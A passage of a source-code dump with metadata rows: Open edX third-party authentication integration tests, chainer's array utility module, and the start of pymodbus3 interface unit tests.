self.assertEqual(login_response['Location'], self.url_prefix + self.complete_url)
# And then we should be redirected to the dashboard:
login_response = self.client.get(login_response['Location'])
self.assertEqual(login_response.status_code, 302)
if user_is_activated:
url_expected = reverse('dashboard')
else:
url_expected = reverse('third_party_inactive_redirect') + '?next=' + reverse('dashboard')
self.assertEqual(login_response['Location'], self.url_prefix + url_expected)
# Now we are logged in:
dashboard_response = self.client.get(reverse('dashboard'))
self.assertEqual(dashboard_response.status_code, 200)
def _check_login_page(self):
"""
Load the login form and check that it contains a button for the provider.
Return the URL for logging into that provider.
"""
return self._check_login_or_register_page(self.login_page_url, "loginUrl")
def _check_register_page(self):
"""
Load the registration form and check that it contains a button for the provider.
Return the URL for registering with that provider.
"""
return self._check_login_or_register_page(self.register_page_url, "registerUrl")
def _check_login_or_register_page(self, url, url_to_return):
""" Shared logic for _check_login_page() and _check_register_page() """
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn(self.PROVIDER_NAME, response.content)
context_data = response.context['data']['third_party_auth']
provider_urls = {provider['id']: provider[url_to_return] for provider in context_data['providers']}
self.assertIn(self.PROVIDER_ID, provider_urls)
return provider_urls[self.PROVIDER_ID]
@property
def complete_url(self):
""" Get the auth completion URL for this provider """
return reverse('social:complete', kwargs={'backend': self.PROVIDER_BACKEND})
@unittest.skipUnless(
testutil.AUTH_FEATURES_KEY in django_settings.FEATURES, testutil.AUTH_FEATURES_KEY + ' not in settings.FEATURES')
@django_utils.override_settings() # For settings reversion on a method-by-method basis.
class IntegrationTest(testutil.TestCase, test.TestCase):
"""Abstract base class for provider integration tests."""
# Override setUp and set this:
provider = None
# Methods you must override in your children.
def get_response_data(self):
"""Gets a dict of response data of the form given by the provider.
To determine what the provider returns, drop into a debugger in your
provider's do_auth implementation. Providers may merge different kinds
of data (for example, data about the user and data about the user's
credentials).
"""
raise NotImplementedError
def get_username(self):
"""Gets username based on response data from a provider.
Each provider has different logic for username generation. Sadly,
this is not extracted into its own method in python-social-auth, so we
must provide a getter ourselves.
Note that this is the *initial* value the framework will attempt to use.
If it collides, the pipeline will generate a new username. We extract
it here so we can force collisions in a polymorphic way.
"""
raise NotImplementedError
# Asserts you can optionally override and make more specific.
def assert_redirect_to_provider_looks_correct(self, response):
"""Asserts the redirect to the provider's site looks correct.
When we hit /auth/login/<provider>, we should be redirected to the
provider's site. Here we check that we're redirected, but we don't know
enough about the provider to check what we're redirected to. Child test
implementations may optionally strengthen this assertion with, for
example, more details about the format of the Location header.
"""
self.assertEqual(302, response.status_code)
self.assertTrue(response.has_header('Location'))
def assert_register_response_in_pipeline_looks_correct(self, response, pipeline_kwargs, required_fields):
"""Performs spot checks of the rendered register.html page.
When we display the new account registration form after the user signs
in with a third party, we prepopulate the form with values sent back
from the provider. The exact set of values varies on a provider-by-
provider basis and is generated by
provider.BaseProvider.get_register_form_data. We provide some stock
assertions based on the provider's implementation; if you want more
assertions in your test, override this method.
"""
self.assertEqual(200, response.status_code)
# Check that the correct provider was selected.
self.assertIn('successfully signed in with <strong>%s</strong>' % self.provider.name, response.content)
# Expect that each truthy value we've prepopulated the register form
# with is actually present.
form_field_data = self.provider.get_register_form_data(pipeline_kwargs)
for prepopulated_form_data in form_field_data:
if prepopulated_form_data in required_fields:
self.assertIn(form_field_data[prepopulated_form_data], response.content.decode('utf-8'))
# Implementation details and actual tests past this point -- no more
# configuration needed.
def setUp(self):
super(IntegrationTest, self).setUp()
self.request_factory = test.RequestFactory()
@property
def backend_name(self):
""" Shortcut for the backend name """
return self.provider.backend_name
# pylint: disable=invalid-name
def assert_account_settings_context_looks_correct(self, context, duplicate=False, linked=None):
"""Asserts the user's account settings page context is in the expected state.
If duplicate is True, we expect context['duplicate_provider'] to contain
the duplicate provider backend name. If linked is passed, we conditionally
check that the provider is included in context['auth']['providers'] and
its connected state is correct.
"""
if duplicate:
self.assertEqual(context['duplicate_provider'], self.provider.backend_name)
else:
self.assertIsNone(context['duplicate_provider'])
if linked is not None:
expected_provider = [
provider for provider in context['auth']['providers'] if provider['name'] == self.provider.name
][0]
self.assertIsNotNone(expected_provider)
self.assertEqual(expected_provider['connected'], linked)
def assert_exception_redirect_looks_correct(self, expected_uri, auth_entry=None):
"""Tests middleware conditional redirection.
middleware.ExceptionMiddleware makes sure the user ends up in the right
place when they cancel authentication via the provider's UX.
"""
exception_middleware = middleware.ExceptionMiddleware()
request, _ = self.get_request_and_strategy(auth_entry=auth_entry)
response = exception_middleware.process_exception(
request, exceptions.AuthCanceled(request.backend))
location = response.get('Location')
self.assertEqual(302, response.status_code)
self.assertIn('canceled', location)
self.assertIn(self.backend_name, location)
self.assertTrue(location.startswith(expected_uri + '?'))
def assert_first_party_auth_trumps_third_party_auth(self, email=None, password=None, success=None):
"""Asserts first party auth was used in place of third party auth.
Args:
email: string. The user's email. If not None, will be set on POST.
password: string. The user's password. If not None, will be set on
POST.
success: None or bool. Whether we expect auth to be successful. Set
to None to indicate we expect the request to be invalid (meaning
one of username or password will be missing).
"""
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
self.create_user_models_for_existing_account(
strategy, email, password, self.get_username(), skip_social_auth=True)
strategy.request.POST = dict(strategy.request.POST)
if email:
strategy.request.POST['email'] = email
if password:
strategy.request.POST['password'] = 'bad_' + password if success is False else password
self.assert_pipeline_running(strategy.request)
payload = json.loads(student_views.login_user(strategy.request).content)
if success is None:
# Request malformed -- just one of email/password given.
self.assertFalse(payload.get('success'))
self.assertIn('There was an error receiving your login information', payload.get('value'))
elif success:
# Request well-formed and credentials good.
self.assertTrue(payload.get('success'))
else:
# Request well-formed but credentials bad.
self.assertFalse(payload.get('success'))
self.assertIn('incorrect', payload.get('value'))
def assert_json_failure_response_is_inactive_account(self, response):
"""Asserts failure on /login for inactive account looks right."""
self.assertEqual(200, response.status_code) # Yes, it's a 200 even though it's a failure.
payload = json.loads(response.content)
self.assertFalse(payload.get('success'))
self.assertIn('In order to sign in, you need to activate your account.', payload.get('value'))
def assert_json_failure_response_is_missing_social_auth(self, response):
"""Asserts failure on /login for missing social auth looks right."""
self.assertEqual(403, response.status_code)
self.assertIn(
"successfully logged into your %s account, but this account isn't linked" % self.provider.name,
response.content
)
def assert_json_failure_response_is_username_collision(self, response):
"""Asserts the json response indicates a username collision."""
self.assertEqual(400, response.status_code)
payload = json.loads(response.content)
self.assertFalse(payload.get('success'))
self.assertIn('belongs to an existing account', payload.get('value'))
def assert_json_success_response_looks_correct(self, response):
"""Asserts the json response indicates success and redirection."""
self.assertEqual(200, response.status_code)
payload = json.loads(response.content)
self.assertTrue(payload.get('success'))
self.assertEqual(pipeline.get_complete_url(self.provider.backend_name), payload.get('redirect_url'))
def assert_login_response_before_pipeline_looks_correct(self, response):
"""Asserts a GET of /login not in the pipeline looks correct."""
self.assertEqual(200, response.status_code)
# The combined login/registration page dynamically generates the login button,
# but we can still check that the provider name is passed in the data attribute
# for the container element.
self.assertIn(self.provider.name, response.content)
def assert_login_response_in_pipeline_looks_correct(self, response):
"""Asserts a GET of /login in the pipeline looks correct."""
self.assertEqual(200, response.status_code)
def assert_password_overridden_by_pipeline(self, username, password):
"""Verifies that the given password is not correct.
The pipeline overrides POST['password'], if any, with random data.
"""
self.assertIsNone(auth.authenticate(password=password, username=username))
def assert_pipeline_running(self, request):
"""Makes sure the given request is running an auth pipeline."""
self.assertTrue(pipeline.running(request))
def assert_redirect_to_dashboard_looks_correct(self, response):
"""Asserts a response would redirect to /dashboard."""
self.assertEqual(302, response.status_code)
# NOTE: Ideally we should use assertRedirects(), however it errors out due to the hostname, testserver,
# not being properly set. This may be an issue with the call made by PSA, but we are not certain.
# pylint: disable=protected-access
self.assertTrue(response.get('Location').endswith(django_settings.SOCIAL_AUTH_LOGIN_REDIRECT_URL))
def assert_redirect_to_login_looks_correct(self, response):
"""Asserts a response would redirect to /login."""
self.assertEqual(302, response.status_code)
self.assertEqual('/login', response.get('Location'))
def assert_redirect_to_register_looks_correct(self, response):
"""Asserts a response would redirect to /register."""
self.assertEqual(302, response.status_code)
self.assertEqual('/register', response.get('Location'))
def assert_register_response_before_pipeline_looks_correct(self, response):
"""Asserts a GET of /register not in the pipeline looks correct."""
self.assertEqual(200, response.status_code)
# The combined login/registration page dynamically generates the register button,
# but we can still check that the provider name is passed in the data attribute
# for the container element.
self.assertIn(self.provider.name, response.content)
def assert_social_auth_does_not_exist_for_user(self, user, strategy):
"""Asserts a user does not have an auth with the expected provider."""
social_auths = strategy.storage.user.get_social_auth_for_user(
user, provider=self.provider.backend_name)
self.assertEqual(0, len(social_auths))
def assert_social_auth_exists_for_user(self, user, strategy):
"""Asserts a user has a social auth with the expected provider."""
social_auths = strategy.storage.user.get_social_auth_for_user(
user, provider=self.provider.backend_name)
self.assertEqual(1, len(social_auths))
self.assertEqual(self.backend_name, social_auths[0].provider)
def create_user_models_for_existing_account(self, strategy, email, password, username, skip_social_auth=False):
"""Creates user, profile, registration, and (usually) social auth.
This synthesizes what happens during /register.
See student.views.register and student.views._do_create_account.
"""
response_data = self.get_response_data()
uid = strategy.request.backend.get_user_id(response_data, response_data)
user = social_utils.Storage.user.create_user(email=email, password=password, username=username)
profile = student_models.UserProfile(user=user)
profile.save()
registration = student_models.Registration()
registration.register(user)
registration.save()
if not skip_social_auth:
social_utils.Storage.user.create_social_auth(user, uid, self.provider.backend_name)
return user
def fake_auth_complete(self, strategy):
"""Fake implementation of social_core.backends.BaseAuth.auth_complete.
Unlike what the docs say, it does not need to return a user instance.
Sometimes (like when directing users to the /register form) it instead
returns a response that 302s to /register.
"""
args = ()
kwargs = {
'request': strategy.request,
'backend': strategy.request.backend,
'user': None,
'response': self.get_response_data(),
}
return strategy.authenticate(*args, **kwargs)
def get_registration_post_vars(self, overrides=None):
"""POST vars generated by the registration form."""
defaults = {
'username': 'username',
'name': 'First Last',
'gender': '',
'year_of_birth': '',
'level_of_education': '',
'goals': '',
'honor_code': 'true',
'terms_of_service': 'true',
'password': 'password',
'mailing_address': '',
'email': '[email protected]',
}
if overrides:
defaults.update(overrides)
return defaults
def get_request_and_strategy(self, auth_entry=None, redirect_uri=None):
"""Gets a fully-configured request and strategy.
These two objects contain circular references, so we create them
together. The references themselves are a mixture of normal __init__
stuff and monkey-patching done by python-social-auth. See, for example,
social_django.utils.strategy().
"""
request = self.request_factory.get(
pipeline.get_complete_url(self.backend_name) +
'?redirect_state=redirect_state_value&code=code_value&state=state_value')
request.site = SiteFactory.create()
request.user = auth_models.AnonymousUser()
request.session = cache.SessionStore()
request.session[self.backend_name + '_state'] = 'state_value'
if auth_entry:
request.session[pipeline.AUTH_ENTRY_KEY] = auth_entry
strategy = social_utils.load_strategy(request=request)
request.social_strategy = strategy
request.backend = social_utils.load_backend(strategy, self.backend_name, redirect_uri)
return request, strategy
@contextmanager
def _patch_edxmako_current_request(self, request):
"""Make ``request`` be the current request for edxmako template rendering."""
with mock.patch('edxmako.request_context.get_current_request', return_value=request):
yield
def get_user_by_email(self, strategy, email):
"""Gets a user by email, using the given strategy."""
return strategy.storage.user.user_model().objects.get(email=email)
def assert_logged_in_cookie_redirect(self, response):
"""Verify that the user was redirected in order to set the logged in cookie. """
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["Location"],
pipeline.get_complete_url(self.provider.backend_name)
)
self.assertEqual(response.cookies[django_settings.EDXMKTG_LOGGED_IN_COOKIE_NAME].value, 'true')
self.assertIn(django_settings.EDXMKTG_USER_INFO_COOKIE_NAME, response.cookies)
def set_logged_in_cookies(self, request):
"""Simulate setting the marketing site cookie on the request. """
request.COOKIES[django_settings.EDXMKTG_LOGGED_IN_COOKIE_NAME] = 'true'
request.COOKIES[django_settings.EDXMKTG_USER_INFO_COOKIE_NAME] = json.dumps({
'version': django_settings.EDXMKTG_USER_INFO_COOKIE_VERSION,
})
# Actual tests, executed once per child.
def test_canceling_authentication_redirects_to_login_when_auth_entry_login(self):
self.assert_exception_redirect_looks_correct('/login', auth_entry=pipeline.AUTH_ENTRY_LOGIN)
def test_canceling_authentication_redirects_to_register_when_auth_entry_register(self):
self.assert_exception_redirect_looks_correct('/register', auth_entry=pipeline.AUTH_ENTRY_REGISTER)
def test_canceling_authentication_redirects_to_account_settings_when_auth_entry_account_settings(self):
self.assert_exception_redirect_looks_correct(
'/account/settings', auth_entry=pipeline.AUTH_ENTRY_ACCOUNT_SETTINGS
)
def test_canceling_authentication_redirects_to_root_when_auth_entry_not_set(self):
self.assert_exception_redirect_looks_correct('/')
def test_full_pipeline_succeeds_for_linking_account(self):
# First, create, the request and strategy that store pipeline state,
# configure the backend, and mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
pipeline.analytics.track = mock.MagicMock()
request.user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username(), skip_social_auth=True)
# Instrument the pipeline to get to the dashboard with the full
# expected state.
self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN))
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
student_views.signin_user(strategy.request)
student_views.login_user(strategy.request)
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
# First we expect that we're in the unlinked state, and that there
# really is no association in the backend.
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=False)
self.assert_social_auth_does_not_exist_for_user(request.user, strategy)
# We should be redirected back to the complete page, setting
# the "logged in" cookie for the marketing site.
self.assert_logged_in_cookie_redirect(actions.do_complete(
request.backend, social_views._do_login, request.user, None, # pylint: disable=protected-access
redirect_field_name=auth.REDIRECT_FIELD_NAME
))
# Set the cookie and try again
self.set_logged_in_cookies(request)
# Fire off the auth pipeline to link.
self.assert_redirect_to_dashboard_looks_correct( # pylint: disable=protected-access
actions.do_complete(
request.backend,
social_views._do_login,
request.user,
None,
redirect_field_name=auth.REDIRECT_FIELD_NAME
)
)
# Now we expect to be in the linked state, with a backend entry.
self.assert_social_auth_exists_for_user(request.user, strategy)
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=True)
def test_full_pipeline_succeeds_for_unlinking_account(self):
# First, create, the request and strategy that store pipeline state,
# configure the backend, and mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username())
self.assert_social_auth_exists_for_user(user, strategy)
# We're already logged in, so simulate that the cookie is set correctly
self.set_logged_in_cookies(request)
# Instrument the pipeline to get to the dashboard with the full
# expected state.
self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN))
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
with self._patch_edxmako_current_request(strategy.request):
student_views.signin_user(strategy.request)
student_views.login_user(strategy.request)
actions.do_complete(request.backend, social_views._do_login, user=user) # pylint: disable=protected-access
# First we expect that we're in the linked state, with a backend entry.
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=True)
self.assert_social_auth_exists_for_user(request.user, strategy)
# Fire off the disconnect pipeline to unlink.
self.assert_redirect_to_dashboard_looks_correct(
actions.do_disconnect(
request.backend,
request.user,
None,
redirect_field_name=auth.REDIRECT_FIELD_NAME
)
)
# Now we expect to be in the unlinked state, with no backend entry.
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=False)
self.assert_social_auth_does_not_exist_for_user(user, strategy)
def test_linking_already_associated_account_raises_auth_already_associated(self):
# This is of a piece with
# test_already_associated_exception_populates_dashboard_with_error. It
# verifies the exception gets raised when we expect; the latter test
# covers exception handling.
email = '[email protected]'
password = 'password'
username = self.get_username()
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
backend = strategy.request.backend
backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
linked_user = self.create_user_models_for_existing_account(strategy, email, password, username)
unlinked_user = social_utils.Storage.user.create_user(
email='other_' + email, password=password, username='other_' + username)
self.assert_social_auth_exists_for_user(linked_user, strategy)
self.assert_social_auth_does_not_exist_for_user(unlinked_user, strategy)
with self.assertRaises(exceptions.AuthAlreadyAssociated):
# pylint: disable=protected-access
actions.do_complete(backend, social_views._do_login, user=unlinked_user)
def test_already_associated_exception_populates_dashboard_with_error(self):
# Instrument the pipeline with an exception. We test that the
# exception is raised correctly separately, so it's ok that we're
# raising it artificially here. This makes the linked=True artificial
# in the final assert because in practice the account would be
# unlinked, but getting that behavior is cumbersome here and already
# covered in other tests. Using linked=True does, however, let us test
# that the duplicate error has no effect on the state of the controls.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username())
self.assert_social_auth_exists_for_user(user, strategy)
self.client.get('/login')
self.client.get(pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN))
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
with self._patch_edxmako_current_request(strategy.request):
student_views.signin_user(strategy.request)
student_views.login_user(strategy.request)
actions.do_complete(request.backend, social_views._do_login, user=user) # pylint: disable=protected-access
# Monkey-patch storage for messaging; pylint: disable=protected-access
request._messages = fallback.FallbackStorage(request)
middleware.ExceptionMiddleware().process_exception(
request,
exceptions.AuthAlreadyAssociated(self.provider.backend_name, 'account is already in use.'))
self.assert_account_settings_context_looks_correct(
account_settings_context(request), duplicate=True, linked=True)
def test_full_pipeline_succeeds_for_signing_in_to_existing_active_account(self):
# First, create, the request and strategy that store pipeline state,
# configure the backend, and mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
pipeline.analytics.track = mock.MagicMock()
user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username())
self.assert_social_auth_exists_for_user(user, strategy)
self.assertTrue(user.is_active)
# Begin! Ensure that the login form contains expected controls before
# the user starts the pipeline.
self.assert_login_response_before_pipeline_looks_correct(self.client.get('/login'))
# The pipeline starts by a user GETting /auth/login/<provider>.
# Synthesize that request and check that it redirects to the correct
# provider page.
self.assert_redirect_to_provider_looks_correct(self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN)))
# Next, the provider makes a request against /auth/complete/<provider>
# to resume the pipeline.
# pylint: disable=protected-access
self.assert_redirect_to_login_looks_correct(actions.do_complete(request.backend, social_views._do_login))
# At this point we know the pipeline has resumed correctly. Next we
# fire off the view that displays the login form and posts it via JS.
with self._patch_edxmako_current_request(strategy.request):
self.assert_login_response_in_pipeline_looks_correct(student_views.signin_user(strategy.request))
# Next, we invoke the view that handles the POST, and expect it
# redirects to /auth/complete. In the browser ajax handlers will
# redirect the user to the dashboard; we invoke it manually here.
self.assert_json_success_response_looks_correct(student_views.login_user(strategy.request))
# We should be redirected back to the complete page, setting
# the "logged in" cookie for the marketing site.
self.assert_logged_in_cookie_redirect(actions.do_complete(
request.backend, social_views._do_login, request.user, None, # pylint: disable=protected-access
redirect_field_name=auth.REDIRECT_FIELD_NAME
))
# Set the cookie and try again
self.set_logged_in_cookies(request)
self.assert_redirect_to_dashboard_looks_correct(
actions.do_complete(request.backend, social_views._do_login, user=user))
self.assert_account_settings_context_looks_correct(account_settings_context(request))
def test_signin_fails_if_account_not_active(self):
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
user = self.create_user_models_for_existing_account(strategy, '[email protected]', 'password', self.get_username())
user.is_active = False
user.save()
with self._patch_edxmako_current_request(strategy.request):
self.assert_json_failure_response_is_inactive_account(student_views.login_user(strategy.request))
def test_signin_fails_if_no_account_associated(self):
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username(), skip_social_auth=True)
self.assert_json_failure_response_is_missing_social_auth(student_views.login_user(strategy.request))
def test_first_party_auth_trumps_third_party_auth_but_is_invalid_when_only_email_in_request(self):
self.assert_first_party_auth_trumps_third_party_auth(email='[email protected]')
def test_first_party_auth_trumps_third_party_auth_but_is_invalid_when_only_password_in_request(self):
self.assert_first_party_auth_trumps_third_party_auth(password='password')
def test_first_party_auth_trumps_third_party_auth_and_fails_when_credentials_bad(self):
self.assert_first_party_auth_trumps_third_party_auth(
email='[email protected]', password='password', success=False)
def test_first_party_auth_trumps_third_party_auth_and_succeeds_when_credentials_good(self):
self.assert_first_party_auth_trumps_third_party_auth(
email='[email protected]', password='password', success=True)
def test_full_pipeline_succeeds_registering_new_account(self):
# First, create, the request and strategy that store pipeline state.
# Mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_REGISTER, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# Begin! Grab the registration page and check the login control on it.
self.assert_register_response_before_pipeline_looks_correct(self.client.get('/register'))
# The pipeline starts by a user GETting /auth/login/<provider>.
# Synthesize that request and check that it redirects to the correct
# provider page.
self.assert_redirect_to_provider_looks_correct(self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN)))
# Next, the provider makes a request against /auth/complete/<provider>.
# pylint: disable=protected-access
self.assert_redirect_to_register_looks_correct(actions.do_complete(request.backend, social_views._do_login))
# At this point we know the pipeline has resumed correctly. Next we
# fire off the view that displays the registration form.
with self._patch_edxmako_current_request(request):
self.assert_register_response_in_pipeline_looks_correct(
student_views.register_user(strategy.request),
pipeline.get(request)['kwargs'],
['name', 'username', 'email']
)
# Next, we invoke the view that handles the POST. Not all providers
# supply email. Manually add it as the user would have to; this
# also serves as a test of overriding provider values. Always provide a
# password for us to check that we override it properly.
overridden_password = strategy.request.POST.get('password')
email = '[email protected]'
if not strategy.request.POST.get('email'):
strategy.request.POST = self.get_registration_post_vars({'email': email})
# The user must not exist yet...
with self.assertRaises(auth_models.User.DoesNotExist):
self.get_user_by_email(strategy, email)
# ...but when we invoke create_account the existing edX view will make
# it, but not social auths. The pipeline creates those later.
with self._patch_edxmako_current_request(strategy.request):
self.assert_json_success_response_looks_correct(student_views.create_account(strategy.request))
# We've overridden the user's password, so authenticate() with the old
# value won't work:
created_user = self.get_user_by_email(strategy, email)
self.assert_password_overridden_by_pipeline(overridden_password, created_user.username)
# At this point the user object exists, but there is no associated
# social auth.
self.assert_social_auth_does_not_exist_for_user(created_user, strategy)
# We should be redirected back to the complete page, setting
# the "logged in" cookie for the marketing site.
self.assert_logged_in_cookie_redirect(actions.do_complete(
request.backend, social_views._do_login, request.user, None, # pylint: disable=protected-access
redirect_field_name=auth.REDIRECT_FIELD_NAME
))
# Set the cookie and try again
self.set_logged_in_cookies(request)
self.assert_redirect_to_dashboard_looks_correct(
actions.do_complete(strategy.request.backend, social_views._do_login, user=created_user))
# Now the user has been redirected to the dashboard. Their third party account should now be linked.
self.assert_social_auth_exists_for_user(created_user, strategy)
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=True)
def test_new_account_registration_assigns_distinct_username_on_collision(self):
original_username = self.get_username()
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_REGISTER, redirect_uri='social:complete')
# Create a colliding username in the backend, then proceed with
# assignment via pipeline to make sure a distinct username is created.
strategy.storage.user.create_user(username=self.get_username(), email='[email protected]', password='password')
backend = strategy.request.backend
backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# pylint: disable=protected-access
self.assert_redirect_to_register_looks_correct(actions.do_complete(backend, social_views._do_login))
distinct_username = pipeline.get(request)['kwargs']['username']
self.assertNotEqual(original_username, distinct_username)
def test_new_account_registration_fails_if_email_exists(self):
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_REGISTER, redirect_uri='social:complete')
backend = strategy.request.backend
backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# pylint: disable=protected-access
self.assert_redirect_to_register_looks_correct(actions.do_complete(backend, social_views._do_login))
with self._patch_edxmako_current_request(request):
self.assert_register_response_in_pipeline_looks_correct(
student_views.register_user(strategy.request),
pipeline.get(request)['kwargs'],
['name', 'username', 'email']
)
with self._patch_edxmako_current_request(strategy.request):
strategy.request.POST = self.get_registration_post_vars()
# Create twice: once successfully, and once causing a collision.
student_views.create_account(strategy.request)
self.assert_json_failure_response_is_username_collision(student_views.create_account(strategy.request))
def test_pipeline_raises_auth_entry_error_if_auth_entry_invalid(self):
auth_entry = 'invalid'
self.assertNotIn(auth_entry, pipeline._AUTH_ENTRY_CHOICES) # pylint: disable=protected-access
_, strategy = self.get_request_and_strategy(auth_entry=auth_entry, redirect_uri='social:complete')
with self.assertRaises(pipeline.AuthEntryError):
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
def test_pipeline_raises_auth_entry_error_if_auth_entry_missing(self):
_, strategy = self.get_request_and_strategy(auth_entry=None, redirect_uri='social:complete')
with self.assertRaises(pipeline.AuthEntryError):
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# pylint: disable=test-inherits-tests, abstract-method
@django_utils.override_settings(ECOMMERCE_API_URL=TEST_API_URL)
class Oauth2IntegrationTest(IntegrationTest):
"""Base test case for integration tests of Oauth2 providers."""
# Dict of string -> object. Information about the token granted to the
# user. Override with test values in subclass; None to force a throw.
TOKEN_RESPONSE_DATA = None
# Dict of string -> object. Information about the user themself. Override
# with test values in subclass; None to force a throw.
USER_RESPONSE_DATA = None
def get_response_data(self):
"""Gets dict (string -> object) of merged data about the user."""
response_data = dict(self.TOKEN_RESPONSE_DATA)
response_data.update(self.USER_RESPONSE_DATA)
return response_data
| agpl-3.0 | -8,740,238,712,259,354,000 | 50.672594 | 122 | 0.682544 | false |
niboshi/chainer | chainer/utils/array.py | 10 | 1688 | import warnings
import numpy
import six
import chainer
from chainer.backends import cuda
def as_vec(x):
warnings.warn(
'chainer.utils.array.as_vec is deprecated. Please refer to '
'numpy.ravel or other array backend functions to flatten ndarrays.',
DeprecationWarning)
if x.ndim == 1:
return x
return x.ravel()
def as_mat(x):
warnings.warn(
'chainer.utils.array.as_mat is deprecated. Please refer to '
'numpy.reshape or other array backend functions to reshape ndarrays.',
DeprecationWarning)
if x.ndim == 2:
return x
return x.reshape(len(x), -1)
def empty_like(x):
warnings.warn(
'chainer.utils.array.empty_like is deprecated. Please refer to '
'numpy.empty_like or other array backend functions to initialize '
'empty arrays.',
DeprecationWarning)
if cuda.available and isinstance(x, cuda.ndarray):
return cuda.cupy.empty_like(x)
else:
return numpy.empty_like(x)
def size_of_shape(shape):
size = 1
for i in shape:
size *= i
# should not return long in Python 2
return int(size)
def sum_to(x, shape):
if x.shape == shape:
return x
if isinstance(x, chainer.Variable):
raise TypeError(
'chainer.utils.sum_to does not support Variable input. '
'Use chainer.functions.sum_to instead.')
ndim = len(shape)
lead = x.ndim - ndim
lead_axis = tuple(six.moves.range(lead))
axis = tuple([i + lead for i, sx in enumerate(shape) if sx == 1])
y = x.sum(lead_axis + axis, keepdims=True)
if lead > 0:
y = y.squeeze(lead_axis)
return y
| mit | -1,171,037,528,298,418,000 | 24.969231 | 78 | 0.626185 | false |
gregorschatz/pymodbus3 | test/test_interfaces.py | 2 | 2632 | import unittest
from pymodbus3.interfaces import *
class _SingleInstance(Singleton):
pass
class ModbusInterfaceTestsTest(unittest.TestCase):
"""
This is the unittest for the pymodbus3.interfaces module
"""
def setUp(self):
""" Initializes the test environment """
pass
def tearDown(self):
""" Cleans up the test environment """
pass
def test_singleton_interface(self):
""" Test that the singleton interface works """
first = _SingleInstance()
second = _SingleInstance()
self.assertEquals(first, second)
def test_modbus_decoder_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IModbusDecoder()
self.assertRaises(NotImplementedError, lambda: instance.decode(x))
self.assertRaises(NotImplementedError, lambda: instance.lookup_pdu_class(x))
def test_modbus_framer_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IModbusFramer()
self.assertRaises(NotImplementedError, instance.check_frame)
self.assertRaises(NotImplementedError, instance.advance_frame)
self.assertRaises(NotImplementedError, instance.is_frame_ready)
self.assertRaises(NotImplementedError, instance.get_frame)
self.assertRaises(NotImplementedError, lambda: instance.add_to_frame(x))
self.assertRaises(NotImplementedError, lambda: instance.populate_result(x))
self.assertRaises(NotImplementedError, lambda: instance.process_incoming_packet(x, x))
self.assertRaises(NotImplementedError, lambda: instance.build_packet(x))
def test_modbus_slave_context_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IModbusSlaveContext()
self.assertRaises(NotImplementedError, instance.reset)
self.assertRaises(NotImplementedError, lambda: instance.validate(x, x, x))
self.assertRaises(NotImplementedError, lambda: instance.get_values(x, x, x))
